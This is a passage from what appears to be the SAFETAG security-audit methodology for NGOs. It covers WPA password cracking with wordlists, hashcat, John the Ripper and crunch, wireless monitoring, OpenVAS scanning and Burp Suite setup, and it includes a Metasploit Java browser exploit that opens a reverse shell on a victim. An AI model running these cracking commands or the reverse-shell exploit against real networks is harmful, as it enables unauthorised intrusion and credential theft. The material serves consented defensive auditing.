• By using the examples referenced in the WPA Password Cracking exercise, the auditor can attack weak wifi passwords, which present a non-personal and non-disruptive way to demonstrate password security problems. Weak wifi passwords are specifically a challenge, as wifi signals often are accessible outside of an office's physical limits, but provide full access to the private network.
• An Auditor can show or discuss their preferred customization strategy and the tools (like JtR) that automatically "mutate" passwords with numbers, capitals, and so on, to demnonstrate the power of a computer to quickly get around common "tricks"
• An Auditor can also use a password "survey" to get an understanding of password practices within the organization.

Overview

• Where relevant, test discovered password files, the wireless network's password strength, or discuss how adversaries attack passwords

Materials Needed

• For the (most common) WPA password-based attacks, an already-prepared dictionary of words to use to attack the password will be required.
• The Level Up Activity, Password Reverse Race provides a staff activity.

Considerations

• Inform yourself of relevant local laws
• Do not attack individuals at an organization using this, focus on shared passwords (such as wifi)
• Always operate with clear consent based in full understanding

Walkthrough

This component provides resources and recommendations on cracking passwords - both the creation of dictionaries and rules to modify those dictionaries, as well as some basic implementation as well. This is a dangerous (and in many cases, illegal) skill to use, and should be more of a guide to auditors on what password security myths do not work against modern password cracking software, and to use only with permission and only in very specific situations as a demonstration of the power of even a common laptop against weak passwords.

• Download basic word lists
• Research dictionary needs
• Create custom word list
• Build core list(s)
• Attack a password hash using increasingly more time-consuming methods

This skillset, plus demonstration against non-invasive accounts, provides an opening for a discussion with staff on password security. See Level Up for further activities and exercises around passwords.

Primarily for use in the Network Access component, building a password dictionary, understanding the ways to automatically mutate it, and running it against passwords is a useful skill to have, and to use to explain why simple passwords are insecure. This Ars Technica article provides a good insight into the path to tackle iterative password cracking using a variety of tools to meet different goals.

These instructions use a small set of password cracking tools, but many are possible. If there are tools you are more familiar or comfortable with using, these by no means are required. The only constraints are to be respectful and responsible, as well as keeping focused on the overall goals and not getting bogged down.

A good wordlist with a few tweaks tends to break most passwords. Using a collection of all English words, all words from the language of the organization being audited, plus a combination of all these words, plus relevant keywords, addresses, and years tends to crack most wifi passwords in a reasonable timeframe.

An approach which begins with quick, but often fruitful, attacks to more and more complex (and time consuming) attacks is the most rewarding. However, after an hour or two of password hacking, the in-office time on other activities is more valuable, so admit defeat and move on. See the Recommendations section for talking points around the levels of password cracking that exist in the world. You can work on passwords offline/overnight/post-audit for report completeness.

Here is a suggested path to take with suggested tools to help. You might try the first few steps in both the targeted keyword approach and the dictionary approach before moving on to the more complex mutations towards the end of each path.

• Targeted Keywords
• Begin with a simple combination of organizationally relevant keywords (using hashcat's combinator attack, combining your org keyword list with itself)
• Add in numbers/years (simple scripting, hashcat, JtR)
• Add in other mutators like 1337 replacements, capitalization tricks (John)
• Language dictionary attack (simple scripting, hashcat)
• Run a series of dictionary word attacks:
  • A simple language dictionary attack
  • Add in numbers/years (simple scripting, hashcat, JtR)
  • Add in the org keywords (a full combination creates a massive list, recommend starting with 1:1)
  • Try other combinations of the dictionary, keywords, years
  • Add in other mutators like 1337 replacements, capitalization tricks (John)
• Brute forcing (do not bother with this on-site)
• John's incremental modes, limited by types
• Crunch's raw brute-force attack (very, very time intensive - a complete waste of time without GPUs)

Dictionary Research and Creation

Before you arrive on-site it is important to have your password cracking tools downloaded and relevant dictionaries ready to go, as your main demonstration and use of these tools is to gain access to the organization's network. The effectiveness of this demonstration is drastically reduced if you already have had to ask for the password to connect to the Internet and update your dictionaries, tools, or so on. Some of these files (especially larger password dictionaries) can be quite large, so downloading them in-country is not recommended.

Many password dictionary sites, such as SkullSecurity , maintain core dictionaries in multiple languages. If your target language is not available, some quick regular expression work can turn spell-check dictionaries (such as those used by LibreOffice into useful word lists. It is generally useful to always test with English in addition to the target language.

CloudCracker and OpenWall have, for a fee, well-tested password dictionaries.

Keyword generation In addition, create a customized dictionary with words related to the subject as revealed in the Remote Assessment research: organization name, street address, phone number, email domain, wireless network name, etc. For the organization "ExampleOrg , which has its offices at 123 Central St., Federal District, Countryzstan , which does human rights and journalism work and was founded in 1992, some context-based dictionary additions would be:

exampleorg
example
exa
mple
org
123
central
federal
district
countryzstan
human
rights
journo
journalism
1992
92

Also add common password fragments: qwerty, 1234/5/6/7/8, and, based on field experience, four-digit dates back to the year 2001 (plus adding in the founding year of the organization). It's also useful to see what calendar system is in use at your organization's location as some cultures don't use Gregorian years. It's quite amazing how often a recent year will be part of a wifi password -- this presentation discusses many common patterns in passwords: https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

Optional Further steps

Use CeWL to spider the organization's web properties to generate additional phrases. This list will need review, as some of the generated content is not very useful, but may be useful if the site is not in a language the auditor reads fluently.

For passwords other than WPA, specific policies or patterns may help to focus your password dictionary further. PACK, or Password Analysis and Cracking Toolkit is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers." PACK is most useful for large sets of passwords, where it can detect patterns in already-broken passwords to help build new rules. Both password cracking tools listed here are powerful, and have slightly different abilities. The auditor should choose the one they prefer and/or the one which has the features they desire for this job.

Build more complex password lists with scripting and Hashcat One quick way to build a more complex password list is to simply double the list up (a "combinator" attack), so that it includes an entry for each pair of these strings:

You can do a 1-way version of this list simply, such as:

 $ for foo in `cat pwdlist.txt`; do for bar in `cat pwdlist.txt`; do printf $foo$bar'\n'; done; done > pwdpairs.txt
 $ cat pwdlist.txt >> pwdpairs.txt

Hashcat can do this in a live attack under its "combinator" mode, and hashcat-utils (hiding in /usr/share/hashcat-utils/combinator.bin) provides this as a standalone tool. This provides a true combination of the list, so it exponentially increases the list size - use with caution, or use with one larger dictionary and one smaller dictionary.

For example, use these combination approach on your custom dictionary (combining it with itself, creating combinations from the above list such as example92, journorights, exampleorgrights).

$  /usr/share/hashcat-utils/combinator.bin dict.txt dict.txt

Hashcat is extremely powerful when you have desktop computer systems to use, but has a few wordlist manipulation tools that are useful regardless.

More References: (http://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 , http://www.darkmoreops.com/2014/08/18/cracking-wpa2-wpa-with-hashcat-kali-linux/ )

Use word mutation with John the Ripper (JtR) JtR is a powerful tool you can use in combination of existing wordlists, but it also can add in common substitutions (people using zero for the letter "o"). JtR can be used to generate a static list of passwords for other programs, or it can be used directly against a password database. JtR is a bit weak combining words within a wordlist, so you should apply your customizations and any folding before moving on to JtR.

You can add custom "rules" to aid in these substitutions - a base set is included with JtR, but a much more powerful set is added by [KoreLogic] (http://contest-2010.korelogic.com/rules.html). KoreLogic also provides a custom character set "chr file" that takes password frequency data from large collections of real-world passwords to speed up JtR's brute force mode. This PDF presentation has a good walkthrough of how John and Kore's rules work. LinuxConfig Offers another good walkthrough.

The bleeding-edge jumbo version combines both the built-in rules and an optimized version of the KoreLogic rules. This list of KoreLogic Rules provides nice descriptions of what the KoreLogic rules do. In bleeding-jumbo, you can remove "KoreLogicRules". BackReference provides a great example of rules usage.

Some particularly useful ones individual rulesets are: * AppendYears (appends years, from 1900 to 2019) and AppendCurrentYearSpecial (appends 2000-2019 with punctuation) * AddJustNumbers (adds 1-4 digits to the end of everything) * l33t (leet-speek combinations)

There are some build-in combinations of rulesets - for example, just --rules runs john's internal collection of default rules, and --rules:KoreLogic runs a collection of the KoreLogic rules in a thoughtful order, and --rules:all is useful if you hate life.

e.g. :

  $ john -w:dictionary.txt --rules:AppendYears --stdout

Building custom rules

PROTIP Create a dictionary with just "blah" and run various rules against it to understand how each ruleset or combination works. Note specifically that each rule multiplies the size of the dictionary by the number of permutations it introduces. Running the KoreLogic ruleset combination against a one word dictionary creates a list of 6,327,540 permutations on just that word, adding a column output is handy for additional visual impact.

JohnTheRipper/run/john -w=blah.txt --rules:all --stdout |column

Brute force, using John and crunch JtR's "incremental" mode is essentially an optimized brute force attack, so will take a very long time for anything but the shortest passwords, or passwords where you can limit the search space to a character set: "As of version 1.8.0, pre-defined incremental modes are "ASCII" (all 95 printable ASCII characters), "LM_ASCII" (for use on LM hashes), "Alnum" (all 62 alphanumeric characters), "Alpha" (all 52 letters), "LowerNum" (lowercase letters plus digits, for 36 total), "UpperNum" (uppercase letters plus digits, for 36 total), "LowerSpace" (lowercase letters plus space, for 27 total), "Lower" (lowercase letters), "Upper" (uppercase letters), and "Digits" (digits only). The supplied .chr files include data for lengths up to 13 for all of these modes except for "LM_ASCII" (where password portions input to the LM hash halves are assumed to be truncated at length 7) and "Digits" (where the supplied .chr file and pre-defined incremental mode work for lengths up to 20). Some of the many .chr files needed by these pre-defined incremental modes might not be bundled with every version of John the Ripper, being available as a separate download." (http://www.openwall.com/john/doc/MODES.shtml)

As a last resort, you can try a direct brute force attack overnight or post-audit to fill in details on key strength. Crunch is a very simple but thorough approach. Given enough time it will break a password, but it's not particularly fast, even at simple passwords. You can reduce the scope of this attack (and speed it up) if you have a reason to believe the password is all lower-case, all-numeric, or so on. WPA passwords are a minimum of 8 characters, a maximum of 16, and some wifi routers will accept punctuation, but in practice these are usually just [email protected]#$. — so:

$ /path/to/crunch 8 16 a[email protected]#$. | aircrack-ng -a 2 path/to/capture.pcap -b 00:11:22:33:44:55 -w -

This says to try every possible alpha-numeric combination from 8 to 16 characters. This will take a very, very, very long time.

Further Resources

Sample Practice For practice on any of these methods, you can use the wpa-Induction.pcap file from Wireshark.

https://www.schneier.com/blog/archives/2014/03/choosing_secure_1.html

http://zed0.co.uk/crossword/

http://www.instantcheckmate.com/crimewire/is-your-password-really-protecting-you/#lightbox/0/

Note that password cracking systems are rated on the number of password guesses they make per second. Stock laptop computers without high-end graphics cards or any other optimizations can guess 2500 passwords/second. More powerful desktop computers can test over a hundred million each second, and with graphics cards (GPUs) that rises to billions of passwords per second. (https://en.wikipedia.org/wiki/Password_cracking).

This website has a good explanation about how improving the complexity of a password affects how easy it is to break: http://www.lockdown.co.uk/?pg=combi, but is using very out of date numbers - consider a basic laptop able to produce "Class E" attacks, and a desktop, "Class F"

http://rumkin.com/tools/password/passchk.php

http://cyber-defense.sans.org/blog/downloads/ has a calculator buried in the zip file "scripts.zip"

http://www.dailymail.co.uk/sciencetech/article-2331984/Think-strong-password-Hackers-crack-16-character-passwords-hour.html

https://www.grc.com/haystack.htm

https://www.owasp.org/images/a/af/2011-Supercharged-Slides-Redman-OWASP-Feb.pdf

http://www.nytimes.com/2014/11/19/magazine/the-secret-life-of-passwords.html?_r=1

Recommendation

Recommendation: Adopt Stronger Passwords

Any important password should be long enough and complex enough to prevent both standard dictionary attacks and “brute-force attacks” in which clusters of powerful computers work in parallel to test every possible character combination. (We recommend 12 or more completely random characters or a passphrase that contains five or more relatively uncommon words.) The key should not contain common “phrases,” expecially from well known literature like Shakespeare or religious texts, but also should not include number sequences or phrases, especially if they are related to the organization, its employees or its work, and to use unique passwords for each account.

Because this becomes logistically difficult, password managers such as KeePassX or other systems are recommended.

Specifically for wireless passwords, choosing a strong WPA key is one of the most important steps toward defending an organization’s network perimeter from an adversary with the ability to spend some time in the vicinity of the offices. By extension, mitigating this vulnerability is critical to the protection of employees and partners (and confidential data) from the sort of persistent exposure that eventually brings down even the most well-secured information systems.

Because shared keys inevitably end up being written on whiteboards, given to office visitors and emailed to partners, the WPA key should also be changed periodically. This does not have to happen frequently, but anything less than three or four times per year may be unsafe.

As WPA3 becomes more widely adopted, upgrading your network to WPA3 authentication will provide substantial security against wireless password attacks.

Monitor open wireless traffic

Covered in full in Physical and Operational Security

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

• Scan for wireless networks nearby, identify (and confirm) the office network(s).
• Monitor traffic of that network and capture potentially sensitive metadata (wireless security settings, beacons, and MAC addresses).
• Research likely device hardware using MAC addresses.
• Do the staff devices leak sensitive metadata?
• What can be determined about the organization based on broadcast wireless data?

Physical Security Guided Tour

Covered in full in Operational Security Assessment:

Have your point of contact walk you around the office (often as part of introductions on the first day) - mentally note physical security concerns. Document how difficult it would be for a visitor or after-hours break-in to access sensitive systems. Identify physical assets with sensitive content, such as:

• Networking equipment and servers
• User devices (workstations/laptops, smarthpones, USB drives)
• Sensitive information or external storage drives lying on desks
• Accounts/passwords written on post-its, white-boards, etc.
• Unattended, logged in computers
• Unlocked cabinets, computer rooms, or wiring closets
• Network ports that are not in use, especially ones not in plain sight

This can be done remotely via secure videoconference over a smartphone or tablet that can moved around the office easily.

Combining this activity with Office Mapping helps to reduce the awkwardness of taking notes while walking around the office, and if being done remotely, the two separate activities can be used to cross-verify the accuracy of each.

Check Browser and Plugin Vulnerabilities

Summary

Though modern browsers are better at self-updating, and the prevalence of powerful plugins like flash and java are slowly declining, it is valuable to ensure that the browsers in use have updated plugins and are themselves updated.

Overview

Materials Needed

• Metasploit

Considerations

Walkthrough

Outdated Java browser plugins

While the threat described below is more severe if carried out by a local attacker (as they can more readily direct the victim to a malicious Web site), it also works remotely. In fact, if a user can be tricked, by a remote attacker, into clicking on a malicious email or Web link, attacks like this represent a significant perimeter threat. By compromising the victim’s machine, they can give the attacker a local point-of-presence without requiring the attacker to crack WPA keys or gain local access in some other way.

Step 1: Using Metasploit, an attacker can easily create an ad hoc malicious Web site:

$ msfconsole

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.7.0-dev [core:4.7 api:1.0]
+ -- --=[ 1114 exploits - 627 auxiliary - 178 post
+ -- --=[ 307 payloads - 30 encoders - 8 nops

msf > use exploit/multi/browser/java_jre17_exec

msf exploit(java_jre17_exec) > set PAYLOAD java/shell/reverse_tcp
PAYLOAD => java/shell/reverse_tcp

msf exploit(java_jre17_exec) > set LHOST 192.168.1.123
LHOST => 192.168.1.123

msf exploit(java_jre17_exec) > set SRVPORT 8081
SRVPORT => 8081

msf exploit(java_jre17_exec) > set URIPATH java_test
URIPATH => java_test

msf exploit(java_jre17_exec) > run
[*] Exploit running as background job.

Step 2: At this point, any local user who visits http://192.168.1.123:8081/java_test, and who is running a sufficiently out-of-date version of the Java browser plugin, stands a good chance of giving the attacker full access to his computer:

[*] Started reverse handler on 192.168.1.123:4444

msf exploit(java_jre17_exec) >

[*] Using URL: http://0.0.0.0:8081/java_test
[*] Local IP: http://192.168.1.123:8081/java_test
[*] Server started.

msf exploit(java_jre17_exec) >

<remote shell>

Figure 1: Attacker in control of the victim’s computer through a remote command shell

Recommendation

Vulnerability Scanning

Summary

While much of SAFETAG focuses on digital security challenges within and around the office, remote attacks on the organization's website, extranets, and unintended information available from "open sources" all pose real threats and deserve significant attention. SAFETAG takes great care to take a very passive approach to this work, especially when done off-site, so as not to have unintended consequences on the organization's infrastructure or undermine operational security concerns.

This activity uses active research and scanning to detect known vulnerabilities in external and key internal services. Usually penetration tests exploit possible vulnerabilities to confirm their existence. ⁷² But, the use of exploits puts the organization's systems at a level of increased risk ⁷³ that is unacceptable when neither the organization nor the auditor has the time or finances to address the issue. The SAFETAG methodology only uses relatively safe exploitation of vulnerabilities for targeted outcomes. For instance, cracking the wireless access point password allows us to demonstrate the importance of good passwords without singling out any individual's passwords. ⁷⁴

Overview

• Identify services being hosted or used by an organization
• Research externally-facing organization services (websites, services hosted from the office, etc.)
• Research information about identified services (e.g current versions of those services.)
• Run vulnerability scans against websites hosted by the organization, externally facing servers run by the organization, and key intranet servers.

Materials Needed

• A Kali VM, bootable USB, or installed system with OWASP ZAP or OpenVAS installed, updated, and running
  

Considerations

• Be very careful about which automated scans you run to ensure that no aggressive or potentially damaging tests are included.
• OpenVAS saves its scan records in /var/lib/openvas/mgr/tasks.db - this file will contain sensitive data, ensure it is stored securely.
• OpenVAS and other vulnerability scanners can be highly aggressive in their tactics. Tools like Metasploit come with a library of active, functional exploits to "prove" that a system is actively vulnerable. As such, these can be tricky to use. Even OpenVAS on a safe-only scan can appear to a host as an active attack, blocking further access from your IP (this can cause some annoyance if you are, for example, scanning your host organization's website from their network). Some of these scans and techniques -- again, even the "safe" ones -- can also be a violation of local hacking laws. Get explicit permission, give warnings, and be careful.

Walkthrough

Vulnerability Scanning using OpenVAS

Setting up OpenVAS in Kali

openvas initial setup
openvas feed update
openvas check setup
openvas stop
openvas start

Visit https://127.0.0.1:9392/ in a web browser and log in.

Using OpenVAS

Once logged in to OpenVAS, the interface is disturbingly simple to use. For most use, using the Wizard to scan the target server works best. Things to verify before doing so:

• Check the Scan defaults for the Wizard - it should be set to run the built-in "Full and Fast" scan
• For that scan, verify (under Configuration->Scan Configs) that the "Scan Settings" list shows "safe_checks" as "yes"

Once you start a scan, change the display to "auto refresh" to give you more feedback on the scan process. Once the scan is completed, a report can be exported in PDF form.

Common problems * Errors during openvas-start OpenVAS is a rather ... delicate program. Most often, the openvas-start script will not wait long enough between launching openvassd and openvasmd, causing openvasmd to error out. Re-running openvasmd often works, though an entire stop/start cycle seems to be slightly more reliable. Often, openvasmd will error out, but launch anyway. Checking the web interface at https://127.0.0.1:9392 to make sure that you can log in is the best way to check if it's actually successfully launched. * Lost admin password From a root command-line, you can reset the web interface's admin password:

openvasmd --create-user=admin
openvasmd --user=admin --new-password=admin

• openvasmd will never launch In many fresh install cases of OpenVAS7, the openVAS self-signed CA certificate is set to an invalid date, which also causes openvasmd to error out. The check-setup script will recommend rebuilding the database, but the /var/log/openvas/openvasmd.log may have errors discussing certificate errors. If this is the case, try:

  rm /var/lib/openvas/CA/*
  rm /var/lib/openvas/private/CA/*
  openvas-mkcert
  openvas-mkcert-client -n -i
  openvas-check-setup
  openvas-start
  openvasmd --rebuild
  openvas-stop
  openvas-start

Recommendation

The auditor will need to do research and compare against the organization's capacity and risks to give specific recommendations based on the vulnerabilities discovered in the process. Some common recommendations include the following:

• Out of Date Content Manangement System

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure someone responsible for the website is either receiving these emails or checking regularly for available updates. Security updates should be applied immediately. It is a best practice however to have a “test” site where you can first deploy any CMS update before attempting it on a production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but checking the HTTP Response Headers (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox. See Deflect's wiki for more information.

Guide for NGOs about DDoS: Digital First Aid Kit

• Insecure Website Login HTTPS / SSL – this comes at a cost, both the SSL Certificate and often an upgrade to the hosting plan itself. However, without SSL, every password – including the one used for admin access to the website – goes across the Internet in the clear. This is immediately available to a state-level actor through the ISP, and can also be sniffed if accessed by a staff member on a shared wifi connection (at a coffeeshop or airport), and finally if the attacker has broken in to the office network (see the Local Access section). Enabling SSL (and making it the default for your site) also protects the users of your site.

If an organization updates their website via FTP, it is worth noting that FTP is similarly insecure. Many hosting providers provide SFTP or FTPS, (two different, but secure, FTP versions), or secure WebDAV to upload files. These should be used, turning “plain” FTP off altogether if possible.

When switching to SSL/Secure FTP after having used the plain versions, webmasters should also update all administrative passwords, and watch to make sure that no step along the way (hosting provider management/panel, file upload, CMS editing) goes over “clear” channels.

• Website Vulnerabilities

Vulnerability Research

Summary

Overview

• Explore Vulnerability Databases (OVAL, CVE, vendor advisories) for potential risks of systems and software used on servers, user devices, and online services (including the organization's website/CMS)
• Search Exploit Databases to find examples of exploitation of possible vulnerabilities identified.
• Explore default configurations for vulnerabilities such as default passwords or users.

Materials Needed

Considerations

• Treat the data and analyses of this step with the utmost security.
• Use VPNs or Tor to search if conducting the search from a country that is highly competitive with the organization's country, or is known to surveil.

Walkthrough

After completing an automated vulnerability scan (network, system, webapp) and documenting findings, you can now move into vulnerability research:

• Reviewing your findings by researching on public vulnerability Databases about the vulnerability that you have found.
• Identify and enumerate risks involved for a certain vulnerability
• Formulate a mitigation plan or recommendations Below is a list of some of the most common vulnerability databases:
  • National Vulnerability Database
  • Exploit Database
  • Rapid 7 Vulnerability & Exploit Database
  • SecurityFocus BugTraq Database
    
  • WPScan Vulnerability Database
  • PacketStorm
  • CVEDetails
  • KB CERT
  • Skybox Security

Validation: Each of your findings, once reviewed and documented will be enough for your report. However, if you and the organization agreed to verify findings and vulnerability truly exist, you may refer to Penetration Testing resources within SAFETAG framework.

Recommendation

Website Footprinting

See Website Footprinting in Recon for passive / lightweight investigation tools

Web Vulnerability Assessment

Summary

Organizational websites are often a central part of their work, but resource constraints can leave them vulnerable to a wide variety of attacks, from simple DDoS (Distributed Denial of Service) attacks to being leveraged for online scams and malicious advertisin to targeted distruction and subversion. Insecure websites can even be used in "watering hole" attacks where malware is implanted into the site to intentionally target the website's audience.

This activity provides a SAFETAG auditor with a suite of processes and tools to investigate organization and project websites for potential vulnerabilities. There are multiple ways to do this, from passive to more active scanning. SAFETAG takes great care to take a primarily passive approach to this work, especially when done off-site, so as not to have unintended consequences on the organization's infrastructure or undermine operational security concerns. Care should be taken to review operational security concerns, work closely with the organization, and pursue a minimal approach focused on the priorities of the organization. See also the Vulnerability Scanning activity for additional tools and approaches useful for investigating outside of the website itself the server level.

Overview

• Understand the current infrastructure the website is using on the level of the hosting provider, location, Operating system
• Identify the public IP address of the server you will be auditing as you will see in some cases, websites are using proxies or DDoS mitigation services that mask the real IP address of a server
• In the case of shared hosting, identify the hosting service and the current package
• Identify the web server, applications in use & plugins, themes, security protocols in place and users' session management
• Identify mis-configurations, sensitive information publicly available, metadata embedded within the web application
• Look for forgotten or insecure support applications like /phpmyadmin
  
• Run automated vulnerability scans against websites hosted by the organization to identify "low-hanging fruits" especially in the case of auditing an open source and common content management system or other web applications
  
• Perform manual vulnerability assessment and testing to identify server mis-configurations, web sessions, tokens etc.

Materials Needed

Considerations

• Begin with passive techniques and consider if more detail is necessary (e.g. would simply upgrading the CMS solve multiple problems). Remember that the point is to create a clear, simple path towards security, not a comprehensive report on every possible vulnerability
• Seek explicit permission for vulnerability scanning - NOTE: The organization might not be in a position to give you meaningful “permission” to carry out an active remote assessment of "cloud services" used within the organization.
• Agree on the site(s) to scan and determine the intensity of the process
• Ensure documented permission and schedule an appropriate time with the site host.
• In situations where the auditor is doing this work remotely it is important to only run "safe" tests that have no possibility of causing damage to the website. Be very careful about which automated scans you run to ensure that no aggressive or potentially damaging tests are included.
• Understand, discover and review the backup options the website has before starting the audit process.

Walkthrough

Performing web vulnerability assessment can be done in different ways, using different tools and having different results. Choosing any of these steps or guides must not confuse an auditor, but instead, provide a broader scope which should help them finding vulnerabilities as many as they can.

These vulnerabilities can range from: - Web Server/OS level vulnerabilities - Access control vulnerabilities - Application-specific vulnerabilities - Misconfiguration - SQL Injection - Cross-site Scripting - Directory Traversal - Failure to restrict URL Access - Insufficient Transport Layer Protection - LDAP Injections - Malicious Codes - Leaked information

Before pursuing any of these more active scans, review outputs from passive reconnsaisance, DNS history and current information, and (if relevant) CMS version checking. This guide covers a small subset of web vulnerability scanning tools, a more comprehensive list is available at https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools which may provide approaches better suited to specific situations.

OpenVAS, covered in the vulnerablity scanning activity, also includes Wapiti, which can help to detect many of the above common vulnerablitites.

Manual Testing with Burp (Active)

Introduction

According to Burp's official documentation, "Burp Suite is an integrated platform for performing security testing of web applications. It is not a point-and-click tool, but is designed to be used by hands-on testers to support the testing process. With a little bit of effort, anyone can start using the core features of Burp to test the security of their applications. Some of Burp's more advanced features will take further learning and experience to master." To know more about BurpSuite's other tools and features, visit BurpSuite's Tools and it's functions pages.

Requirements

Note: If you are using Kali Linux, you already have Burpsuite pre-installed. Otherwise if you do not have a Linux box, refer to the following requirements below:

• Windows/MAC OSX (Kali Linux Preferred)
• Java Runtime Environment
• Browser (Chrome, Firefox)
• BurpSuite

All of this investment is hugely worth it - Burp's user-driven workflow is by the far the most effective way to perform web security testing, and will take you way beyond the capabilities of any conventional point-and-click scanner. Burp is intuitive and user-friendly, and the best way to start learning is by doing. These steps will get you started with running Burp and using its basic features. You can then read on deeper into the documentation to become more proficient in using this supremely powerful tool.

Burp Suite contains various tools for performing different testing tasks. The tools operate effectively together, and you can pass interesting requests between tools as your work progresses, to carry out different actions.

To know more about BurpSuite's other tools and features, visit BurpSuite's Tools and it's functions pages.

Burp's Getting Started Documentation is quite detailed and useful, and strongly recommends launching Burp from the command line for better control. In specific, it recommends assigning the amount of memory you wish to dedicate to burp:

Requirements

Note: If you are using Kali Linux, you already have Burpsuite pre-installed. Otherwise if you do not have a Linux box, refer to the following requirements below:

• Windows/MAC OSX (Kali Linux Preferred)
• Java Runtime Environment
  
• Browser (Chrome, Firefox)
• BurpSuite

Launching Burpsuite

With Java installed, on some platforms you may be able to run Burp directly by double-clicking the Burp JAR file. However, it is preferable to launch Burp from the command line, as this gives you more control over its execution, in particular the amount of memory that your computer assigns to Burp. To do this, in your command prompt type a command like:

java -jar -Xmx1024m /path/to/burp.jar

where 1024 is the amount of memory (in Mb) that you want to assign to Burp, and /path/to/burp.jar is the location of the Burp JAR file on your computer.

The troubleshooting help can help if Burp doesn't appear shortly.

Setting up your environment

• Verifying Scope/Target:
  • Always check that you have the right URL/Domain before starting. Last thing we wanted to happen is to scan a different target that is out of our scope!

• Setting up your browser

• For Firefox:
  • Paste about:preferences#advanced this in your URL, and click Settings left of Connection
  • Click Manual proxy configuration and enter localhost under HTTP Proxy, with Port set to: 8080
  • Check Use this proxy server for all protocols
• For Chrome:
  • Paste chrome://settings/system then click Open proxy Settings
  • This will open the Network Setting* windows in Kali. Click Network proxy** and set Method to Manual
  • Set HTTP Proxy to 127.0.0.1 with Port valued at 8080
  • Configure the rest of settings with following values above (HTTPS, FTP Proxies, and Socks Host)
• Setting up Socks Proxy (Optional)
• In some cases, you will be required to scan from an approved testing environment or a specific network/IP range. In this case, you have to configure Socks Proxy for your assessment.
• Verify your IP. Take note of your current IP address. (WhatismyIP.com)
• To setup your Socks Proxy, we can do this by connecting via SSH to our server:
  • ssh –D 9292 –l [email protected]_name/ip
• Once authenticated, configure Burpsuite to route it's traffic to our outbound SSH tunnel.
  • From Options Tab, click Connections sub-tab and scroll down to Socks Proxy
  • In Socks Proxy host, type localhost. and under Socks Proxy port, type 9292
  • Then check Use SOCKS proxy button

• You can again check your IP address to verify if your configuration is correct.

Testing Burpsuite Configuration

NOTE: Scanning web applications without the owner's permission is potentially illegal. It is important that you test Burpsuite on your own web applications, or on a controlled environment. There are some publicly available websites that are insecure by default to be used for testing and learning purposes. Among these were:

• bWAPP - Buggy Web Application
• HackThis - Hacker's Playground
• HackThisSite - Community Driven hacking exercises
• HackMe - Community based, collaborative hacking exercises and vulnerable web apps
• CrackMeBank

(You can use these sites to get familiar with Burpsuite, and performing the following excerices in this guide.)

Intercepting Request

• To start intercepting traffic to and from your target domain/URL, in your configured browser, enter the the target domain, and hit enter.
• On your Burpsuite instance, under Proxy Tab, and sub-tab Intercept, make sure that the Intercept button is on.
• If it captures the request from your Firefox browser, it means that your configuration is correct.
• Click Forward and the request will be forwarded to the server/target and the next sub-tab HTTP History will now start to generate some contents, each time you open a link, or a page within the target domain.

Adding Target/Scope - Adding your target into scope is important so you won't miss, or even scan URLs that are not included in your list of targets. - To add the target to your scope, right-click the domain/website, then select Add to Scope - Burp will now tell you if you want ot stop sending out-of-scope items in your HTTP history tab and other Burp Tools - click Yes. - This will now appear in your Target tab, and under Scope sub-tab. - To add subdomains into your scope, you can use regex: .*\.test\.com$

Managing Burp Projects - Managing burpsuites project will depend on the version you are using. Some features may not be available for free version of burp, but are only available for Pro Version. See burp's documentation for managing projects here - Selecting project type: - Temporary project - Quick tasks, no need to save data - New project on Disk - Creates new project and stores it on disk on a "Burp project file" - Open existing project - Opens recent existing project from a "Burp project file". Scanners & spiders are paused.

• Selecting Configuration
  • Burp Defaults - BurpSuite's default options
  • Use options Saved within project - Only available when reopening an existing project. It uses the options saved from the previous project
  • Load from a configuration file - Opens a project using the options contained on a Burp Configuration File

NOTE: According to BurpSuite documentation, "If you open an existing project that was created by a different installation of Burp, then Burp will prompt you to decide whether to take full ownership of the project.

This decision is needed because Burp stores within the project file an identifier that is used to retrieve any ongoing Burp Collaborator interactions that are associated with the project. If two instances of Burp share the same identifier in ongoing work, then some Collaborator-based issues may be missed or incorrectly reported. You should only take full ownership of a project from a different Burp installation if no other instance of Burp is working on that project."

Since that Burpsuite is an advance tool for testing web applications, This guide will cover most of the basic testing activities for Burpsuite. To learn more of the advance features, it is important that you have a licensed version.

Basic BurpSuite Testing Excercises:

Attacking web application using simple payload set (Bruteforce attack): - Verify that your Burp is working - You must first try to test if your Burp and browser are both configured

• Login page of target application
  • Now try visiting any login page of your target web application (you can use any test site mentioned above)
• "Intercept On" - Make sure that you have your burpsuite's intercept function set to "ON".
  • Before you click "ENTER" to submit your sample credentials, you can intercept web traffic request from your browser to the server under Proxy > Intercept tab, then "Intercept" button is set to "ON".
• Review contents of the requests under Proxy > Intercept > Raw
  • On the Raw tab, Once you see the "POST /login.php" request of your browser to the web application server, select ALL and right-click on the selected/highlighted texts and select Send to Intruder
